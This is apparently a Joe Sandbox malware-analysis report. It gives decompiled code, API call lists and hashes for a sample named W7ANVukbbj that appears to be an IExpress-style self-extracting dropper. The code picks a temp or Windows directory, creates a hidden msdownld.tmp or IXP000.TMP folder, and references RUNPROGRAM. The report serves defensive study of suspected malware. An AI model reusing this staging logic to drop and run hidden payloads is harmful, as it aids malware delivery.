                                                                                                                                                                                                          								_t36 = E00866517(_t82, 0x7d2, 0, E00863210, 0, 0);
                                                                                                                                                                                                          								asm("sbb eax, eax");
                                                                                                                                                                                                          								_t38 =  ~( ~_t36);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								__eflags =  *0x869a30; // 0x0
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									goto L46;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t109 = 0x8691e4;
                                                                                                                                                                                                          									_t40 = GetTempPathA(0x104, 0x8691e4); // executed
                                                                                                                                                                                                          									__eflags = _t40;
                                                                                                                                                                                                          									if(_t40 == 0) {
                                                                                                                                                                                                          										L19:
                                                                                                                                                                                                          										_push(_t82);
                                                                                                                                                                                                          										E00861781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                          										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                          										if(_v268 <= 0x5a) {
                                                                                                                                                                                                          											do {
                                                                                                                                                                                                          												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                          												__eflags = _t109 - 6;
                                                                                                                                                                                                          												if(_t109 == 6) {
                                                                                                                                                                                                          													L22:
                                                                                                                                                                                                          													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                          													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                          													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L23;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													__eflags = _t109 - 3;
                                                                                                                                                                                                          													if(_t109 != 3) {
                                                                                                                                                                                                          														L23:
                                                                                                                                                                                                          														__eflags = _t109 - 2;
                                                                                                                                                                                                          														if(_t109 != 2) {
                                                                                                                                                                                                          															L28:
                                                                                                                                                                                                          															_t66 = _v268;
                                                                                                                                                                                                          															goto L29;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_t66 = _v268;
                                                                                                                                                                                                          															__eflags = _t66 - 0x41;
                                                                                                                                                                                                          															if(_t66 == 0x41) {
                                                                                                                                                                                                          																L29:
                                                                                                                                                                                                          																_t60 = _t66 + 1;
                                                                                                                                                                                                          																_v268 = _t60;
                                                                                                                                                                                                          																goto L42;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																__eflags = _t66 - 0x42;
                                                                                                                                                                                                          																if(_t66 == 0x42) {
                                                                                                                                                                                                          																	goto L29;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	_t68 = E00866952( &_v268);
                                                                                                                                                                                                          																	__eflags = _t68;
                                                                                                                                                                                                          																	if(_t68 == 0) {
                                                                                                                                                                                                          																		goto L28;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                          																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                          																			L30:
                                                                                                                                                                                                          																			_push(0);
                                                                                                                                                                                                          																			_t103 = 3;
                                                                                                                                                                                                          																			_t49 = E0086597D( &_v268, _t103, 1);
                                                                                                                                                                                                          																			__eflags = _t49;
                                                                                                                                                                                                          																			if(_t49 != 0) {
                                                                                                                                                                                                          																				L33:
                                                                                                                                                                                                          																				_t50 = E00862630(0,  &_v268, 1);
                                                                                                                                                                                                          																				__eflags = _t50;
                                                                                                                                                                                                          																				if(_t50 != 0) {
                                                                                                                                                                                                          																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																				_t88 =  &_v268;
                                                                                                                                                                                                          																				E0086658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                          																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                          																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                          																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                          																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                          																					__eflags = _t54;
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																				__eflags = _t54;
                                                                                                                                                                                                          																				if(_t54 != 0) {
                                                                                                                                                                                                          																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                          																					_push(_t88);
                                                                                                                                                                                                          																					_t109 = 0x8691e4;
                                                                                                                                                                                                          																					E00861781(0x8691e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                          																					_t101 = 1;
                                                                                                                                                                                                          																					_t59 = E00865467(0x8691e4, 1, 0);
                                                                                                                                                                                                          																					__eflags = _t59;
                                                                                                                                                                                                          																					if(_t59 != 0) {
                                                                                                                                                                                                          																						goto L45;
                                                                                                                                                                                                          																					} else {
                                                                                                                                                                                                          																						_t60 = _v268;
                                                                                                                                                                                                          																						goto L42;
                                                                                                                                                                                                          																					}
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t60 = _v268 + 1;
                                                                                                                                                                                                          																					_v265 = 0;
                                                                                                                                                                                                          																					_v268 = _t60;
                                                                                                                                                                                                          																					goto L42;
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																			} else {
                                                                                                                                                                                                          																				_t65 = E00862630(0,  &_v268, 1);
                                                                                                                                                                                                          																				__eflags = _t65;
                                                                                                                                                                                                          																				if(_t65 != 0) {
                                                                                                                                                                                                          																					goto L28;
                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                          																					_t67 = E0086597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                          																					__eflags = _t67;
                                                                                                                                                                                                          																					if(_t67 == 0) {
                                                                                                                                                                                                          																						goto L28;
                                                                                                                                                                                                          																					} else {
                                                                                                                                                                                                          																						goto L33;
                                                                                                                                                                                                          																					}
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																			}
                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                          																			goto L28;
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L22;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L47;
                                                                                                                                                                                                          												L42:
                                                                                                                                                                                                          												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                          											} while (_t60 <= 0x5a);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L43;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t101 = 1;
                                                                                                                                                                                                          										_t69 = E00865467(0x8691e4, 1, 3); // executed
                                                                                                                                                                                                          										__eflags = _t69;
                                                                                                                                                                                                          										if(_t69 != 0) {
                                                                                                                                                                                                          											goto L45;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t82 = 0x8691e4;
                                                                                                                                                                                                          											_t70 = E00862630(0, 0x8691e4, 1);
                                                                                                                                                                                                          											__eflags = _t70;
                                                                                                                                                                                                          											if(_t70 != 0) {
                                                                                                                                                                                                          												goto L19;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t101 = 1;
                                                                                                                                                                                                          												_t82 = 0x8691e4;
                                                                                                                                                                                                          												_t71 = E00865467(0x8691e4, 1, 1);
                                                                                                                                                                                                          												__eflags = _t71;
                                                                                                                                                                                                          												if(_t71 != 0) {
                                                                                                                                                                                                          													goto L45;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													do {
                                                                                                                                                                                                          														goto L19;
                                                                                                                                                                                                          														L43:
                                                                                                                                                                                                          														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                          														_push(4);
                                                                                                                                                                                                          														_t101 = 3;
                                                                                                                                                                                                          														_t82 =  &_v268;
                                                                                                                                                                                                          														_t44 = E0086597D(_t82, _t101, 1);
                                                                                                                                                                                                          														__eflags = _t44;
                                                                                                                                                                                                          													} while (_t44 != 0);
                                                                                                                                                                                                          													goto L2;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                          							if(_t35 != 0x5c) {
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								_t72 = 1;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								__eflags =  *0x868b3f - _t35; // 0x0
                                                                                                                                                                                                          								_t72 = 0;
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t101 = 0;
                                                                                                                                                                                                          							_t73 = E00865467(0x868b3e, 0, _t72);
                                                                                                                                                                                                          							__eflags = _t73;
                                                                                                                                                                                                          							if(_t73 != 0) {
                                                                                                                                                                                                          								L45:
                                                                                                                                                                                                          								_t38 = 1;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t101 = 0x4be;
                                                                                                                                                                                                          								E008644B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t101 = 0x4b1;
                                                                                                                                                                                                          						E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						LocalFree(_t109);
                                                                                                                                                                                                          						 *0x869124 = 0x80070714;
                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t101 = 0x4b5;
                                                                                                                                                                                                          					E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					_t38 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L47:
                                                                                                                                                                                                          				return E00866CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                          			}





































                                                                                                                                                                                                          0x008655ab
                                                                                                                                                                                                          0x008655b2
                                                                                                                                                                                                          0x008655c9
                                                                                                                                                                                                          0x008655d5
                                                                                                                                                                                                          0x008655d9
                                                                                                                                                                                                          0x00865600
                                                                                                                                                                                                          0x00865605
                                                                                                                                                                                                          0x0086560a
                                                                                                                                                                                                          0x0086560c
                                                                                                                                                                                                          0x00865638
                                                                                                                                                                                                          0x00865641
                                                                                                                                                                                                          0x00865643
                                                                                                                                                                                                          0x00865645
                                                                                                                                                                                                          0x00865645
                                                                                                                                                                                                          0x0086564c
                                                                                                                                                                                                          0x00865652
                                                                                                                                                                                                          0x00865657
                                                                                                                                                                                                          0x00865659
                                                                                                                                                                                                          0x00865696
                                                                                                                                                                                                          0x0086569c
                                                                                                                                                                                                          0x0086589f
                                                                                                                                                                                                          0x008658a7
                                                                                                                                                                                                          0x008658ac
                                                                                                                                                                                                          0x008658b3
                                                                                                                                                                                                          0x008658b5
                                                                                                                                                                                                          0x008656a2
                                                                                                                                                                                                          0x008656a2
                                                                                                                                                                                                          0x008656a8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656ae
                                                                                                                                                                                                          0x008656ae
                                                                                                                                                                                                          0x008656b9
                                                                                                                                                                                                          0x008656bf
                                                                                                                                                                                                          0x008656c1
                                                                                                                                                                                                          0x008656f3
                                                                                                                                                                                                          0x008656f3
                                                                                                                                                                                                          0x00865705
                                                                                                                                                                                                          0x0086570a
                                                                                                                                                                                                          0x00865711
                                                                                                                                                                                                          0x00865717
                                                                                                                                                                                                          0x00865724
                                                                                                                                                                                                          0x00865726
                                                                                                                                                                                                          0x00865729
                                                                                                                                                                                                          0x00865730
                                                                                                                                                                                                          0x00865737
                                                                                                                                                                                                          0x0086573d
                                                                                                                                                                                                          0x00865740
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086572b
                                                                                                                                                                                                          0x0086572b
                                                                                                                                                                                                          0x0086572e
                                                                                                                                                                                                          0x00865742
                                                                                                                                                                                                          0x00865742
                                                                                                                                                                                                          0x00865745
                                                                                                                                                                                                          0x0086576b
                                                                                                                                                                                                          0x0086576b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865747
                                                                                                                                                                                                          0x00865747
                                                                                                                                                                                                          0x0086574d
                                                                                                                                                                                                          0x0086574f
                                                                                                                                                                                                          0x00865771
                                                                                                                                                                                                          0x00865771
                                                                                                                                                                                                          0x00865773
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865751
                                                                                                                                                                                                          0x00865751
                                                                                                                                                                                                          0x00865753
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865755
                                                                                                                                                                                                          0x0086575b
                                                                                                                                                                                                          0x00865760
                                                                                                                                                                                                          0x00865762
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865764
                                                                                                                                                                                                          0x00865764
                                                                                                                                                                                                          0x00865769
                                                                                                                                                                                                          0x0086577e
                                                                                                                                                                                                          0x0086577e
                                                                                                                                                                                                          0x00865781
                                                                                                                                                                                                          0x00865788
                                                                                                                                                                                                          0x0086578d
                                                                                                                                                                                                          0x0086578f
                                                                                                                                                                                                          0x008657b2
                                                                                                                                                                                                          0x008657b8
                                                                                                                                                                                                          0x008657bd
                                                                                                                                                                                                          0x008657bf
                                                                                                                                                                                                          0x008657cd
                                                                                                                                                                                                          0x008657cd
                                                                                                                                                                                                          0x008657dd
                                                                                                                                                                                                          0x008657e3
                                                                                                                                                                                                          0x008657ef
                                                                                                                                                                                                          0x008657f5
                                                                                                                                                                                                          0x008657f8
                                                                                                                                                                                                          0x0086580a
                                                                                                                                                                                                          0x0086580a
                                                                                                                                                                                                          0x008657fa
                                                                                                                                                                                                          0x00865802
                                                                                                                                                                                                          0x00865802
                                                                                                                                                                                                          0x0086580d
                                                                                                                                                                                                          0x0086580f
                                                                                                                                                                                                          0x00865830
                                                                                                                                                                                                          0x00865836
                                                                                                                                                                                                          0x0086583d
                                                                                                                                                                                                          0x0086584b
                                                                                                                                                                                                          0x00865851
                                                                                                                                                                                                          0x00865855
                                                                                                                                                                                                          0x0086585a
                                                                                                                                                                                                          0x0086585c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086585e
                                                                                                                                                                                                          0x0086585e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086585e
                                                                                                                                                                                                          0x00865811
                                                                                                                                                                                                          0x00865817
                                                                                                                                                                                                          0x00865819
                                                                                                                                                                                                          0x0086581f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086581f
                                                                                                                                                                                                          0x00865791
                                                                                                                                                                                                          0x00865797
                                                                                                                                                                                                          0x0086579c
                                                                                                                                                                                                          0x0086579e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008657a0
                                                                                                                                                                                                          0x008657a9
                                                                                                                                                                                                          0x008657ae
                                                                                                                                                                                                          0x008657b0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008657b0
                                                                                                                                                                                                          0x0086579e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865769
                                                                                                                                                                                                          0x00865762
                                                                                                                                                                                                          0x00865753
                                                                                                                                                                                                          0x0086574f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086572e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865864
                                                                                                                                                                                                          0x00865864
                                                                                                                                                                                                          0x00865864
                                                                                                                                                                                                          0x00865717
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656c3
                                                                                                                                                                                                          0x008656c5
                                                                                                                                                                                                          0x008656c9
                                                                                                                                                                                                          0x008656ce
                                                                                                                                                                                                          0x008656d0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656d6
                                                                                                                                                                                                          0x008656d6
                                                                                                                                                                                                          0x008656d8
                                                                                                                                                                                                          0x008656dd
                                                                                                                                                                                                          0x008656df
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656e1
                                                                                                                                                                                                          0x008656e2
                                                                                                                                                                                                          0x008656e4
                                                                                                                                                                                                          0x008656e6
                                                                                                                                                                                                          0x008656eb
                                                                                                                                                                                                          0x008656ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656f3
                                                                                                                                                                                                          0x008656f3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086586c
                                                                                                                                                                                                          0x00865878
                                                                                                                                                                                                          0x0086587e
                                                                                                                                                                                                          0x00865882
                                                                                                                                                                                                          0x00865883
                                                                                                                                                                                                          0x00865889
                                                                                                                                                                                                          0x0086588e
                                                                                                                                                                                                          0x0086588e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865896
                                                                                                                                                                                                          0x008656ed
                                                                                                                                                                                                          0x008656df
                                                                                                                                                                                                          0x008656d0
                                                                                                                                                                                                          0x008656c1
                                                                                                                                                                                                          0x008656a8
                                                                                                                                                                                                          0x0086565b
                                                                                                                                                                                                          0x0086565b
                                                                                                                                                                                                          0x0086565d
                                                                                                                                                                                                          0x00865669
                                                                                                                                                                                                          0x00865669
                                                                                                                                                                                                          0x0086565f
                                                                                                                                                                                                          0x0086565f
                                                                                                                                                                                                          0x00865665
                                                                                                                                                                                                          0x00865667
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865667
                                                                                                                                                                                                          0x0086566c
                                                                                                                                                                                                          0x00865673
                                                                                                                                                                                                          0x00865678
                                                                                                                                                                                                          0x0086567a
                                                                                                                                                                                                          0x0086589b
                                                                                                                                                                                                          0x0086589b
                                                                                                                                                                                                          0x00865680
                                                                                                                                                                                                          0x00865685
                                                                                                                                                                                                          0x0086568c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086568c
                                                                                                                                                                                                          0x0086567a
                                                                                                                                                                                                          0x0086560e
                                                                                                                                                                                                          0x00865613
                                                                                                                                                                                                          0x0086561a
                                                                                                                                                                                                          0x00865620
                                                                                                                                                                                                          0x00865626
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865626
                                                                                                                                                                                                          0x008655db
                                                                                                                                                                                                          0x008655e0
                                                                                                                                                                                                          0x008655e7
                                                                                                                                                                                                          0x008655f1
                                                                                                                                                                                                          0x008655f6
                                                                                                                                                                                                          0x008655f6
                                                                                                                                                                                                          0x008655f6
                                                                                                                                                                                                          0x008658b7
                                                                                                                                                                                                          0x008658c7

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 008655CF
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00865638
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0086564C
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00865620
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          • GetTempPathA.KERNELBASE(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008656B9
                                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0086571E
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00865737
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 008657CD
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 008657EF
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00865802
                                                                                                                                                                                                            • Part of subcall function 00862630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00862654
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00865830
                                                                                                                                                                                                            • Part of subcall function 00866517: FindResourceA.KERNEL32(00860000,000007D6,00000005), ref: 0086652A
                                                                                                                                                                                                            • Part of subcall function 00866517: LoadResource.KERNEL32(00860000,00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00866538
                                                                                                                                                                                                            • Part of subcall function 00866517: DialogBoxIndirectParamA.USER32(00860000,00000000,00000547,008619E0,00000000), ref: 00866557
                                                                                                                                                                                                            • Part of subcall function 00866517: FreeResource.KERNEL32(00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00866560
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00865878
                                                                                                                                                                                                            • Part of subcall function 0086597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008659A8
                                                                                                                                                                                                            • Part of subcall function 0086597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 008659AF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                          • API String ID: 2436801531-3855382519
                                                                                                                                                                                                          • Opcode ID: 288b08647c1a43e6f953b37916f7192bd899fbb9d31a9076dc5160c517237c51
                                                                                                                                                                                                          • Instruction ID: 2871a1fdbde40467536b88e73e27b83dd64aeb346649e9c1cb40de57e371e31d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 288b08647c1a43e6f953b37916f7192bd899fbb9d31a9076dc5160c517237c51
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36810870A04A149ADB24AB68DC55BEB776DFB60300F0700A5F586E3191EEB48DC58B52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E008653A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t5;
                                                                                                                                                                                                          				long _t13;
                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                          				CHAR* _t20;
                                                                                                                                                                                                          				int _t29;
                                                                                                                                                                                                          				int _t30;
                                                                                                                                                                                                          				CHAR* _t32;
                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t5 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                          				_t32 = __edx;
                                                                                                                                                                                                          				_t20 = __ecx;
                                                                                                                                                                                                          				_t29 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					E0086171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                          					_t34 = _t34 + 0x10;
                                                                                                                                                                                                          					_t29 = _t29 + 1;
                                                                                                                                                                                                          					E00861680(_t32, 0x104, _t20);
                                                                                                                                                                                                          					E0086658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                          					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                          					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                          					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t29 < 0x190) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                          					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                          						_t30 = 1;
                                                                                                                                                                                                          						DeleteFileA(_t32);
                                                                                                                                                                                                          						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return E00866CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                          				if(_t14 == 0) {
                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t30 = 1;
                                                                                                                                                                                                          				 *0x868a20 = 1;
                                                                                                                                                                                                          				goto L5;
                                                                                                                                                                                                          			}

















                                                                                                                                                                                                          0x008653ac
                                                                                                                                                                                                          0x008653b3
                                                                                                                                                                                                          0x008653b9
                                                                                                                                                                                                          0x008653bb
                                                                                                                                                                                                          0x008653bd
                                                                                                                                                                                                          0x008653bf
                                                                                                                                                                                                          0x008653d1
                                                                                                                                                                                                          0x008653d6
                                                                                                                                                                                                          0x008653e0
                                                                                                                                                                                                          0x008653e2
                                                                                                                                                                                                          0x008653f5
                                                                                                                                                                                                          0x008653fb
                                                                                                                                                                                                          0x00865402
                                                                                                                                                                                                          0x0086540b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865413
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865415
                                                                                                                                                                                                          0x00865416
                                                                                                                                                                                                          0x00865427
                                                                                                                                                                                                          0x0086542a
                                                                                                                                                                                                          0x0086542b
                                                                                                                                                                                                          0x00865434
                                                                                                                                                                                                          0x00865434
                                                                                                                                                                                                          0x0086543a
                                                                                                                                                                                                          0x0086544c
                                                                                                                                                                                                          0x0086544c
                                                                                                                                                                                                          0x00865452
                                                                                                                                                                                                          0x0086545a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086545e
                                                                                                                                                                                                          0x0086545f
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086171E: _vsnprintf.MSVCRT ref: 00861750
                                                                                                                                                                                                          • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008653FB
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865402
